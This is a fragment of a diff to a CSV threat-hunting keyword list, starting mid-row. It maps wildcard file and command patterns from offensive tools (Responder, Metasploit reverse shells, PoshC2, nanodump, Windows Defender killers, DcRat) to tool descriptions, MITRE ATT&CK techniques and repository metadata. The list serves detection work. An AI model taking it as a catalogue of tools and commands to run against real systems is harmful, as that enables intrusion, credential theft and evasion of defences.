tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*RemoveKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*remove-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Remove-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*remove-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Remove-PoshRat*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*removeRegTrace*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" -"*Remove-Update.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Remove-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Remove-Update.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Remove-VolumeShadowCopy*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*renameMachine.py -current-name * -new-name * -dc-ip * *:*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*renameMachine.py -current-name * -new-name*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1078.001 - T1078.002 - T1059.003 - T1059.001 - T1053.005 - T1021.001 - T1003.001 - T1003.002 - T1003.004 - T1001.001 ","TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*replace_key_iv_shellcode*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" -"*replace_video_fake_plugin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*replace_video_fake_plugin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*RequestAsPython-PowerShell.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite. the request gets transformed to its equivalent in Python requests. Python urllib2. and PowerShell Invoke-WebRequest.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*reshacker_setup.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*ResourceDevelopment_EstablishAccounts_RGPerson.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -15808,23 +15988,24 @@ "*ResourceDevelopment_WebServices_TencentAPIGateway.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Resources/Design/NinjaStyle.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Resources/drone.dll*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Resources\donut.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*responder * --lm*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*responder -i *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Resources\donut.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*responder * --lm*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*responder -i *","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder --interface*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Responder.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Responder.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Responder/tools/MultiRelay/bin/Runas.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Responder/tools/MultiRelay/bin/Syssvc.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*responder-http-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*responder-http-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Responder-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Responder-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*responder-smb-off*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*responder-smb-on*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Responder-Windows*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*RestartKeePass.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*restic2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Responder-Windows*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*RestartKeePass.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*restic2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*restore_signature.sh *.dmp*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*RestrictedAdmin.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","855","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*RestrictedAdmin.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*return-wizard-rce-exim.txt*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*rev_kali_192_168_0_110_1234*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*reveng007/C2_Server*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" @@ -15833,82 +16014,82 @@ "*reveng007/ReflectiveNtdll*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*reveng007/SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*reverse_shell_minified.js*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*reverse_tcp_x64.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reverse_win_http.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*reverse_tcp_x64.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*reverse_win_http.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*reverseDisableWinDef.cpp*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" -"*ReverseProxy.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*ReverseProxy.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*ReverseShell.ps1*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" -"*ReverseShell_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*ReverseShell_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*ReverseSocksProxyHandler.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*ReverseSocksProxyHandler.py*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - 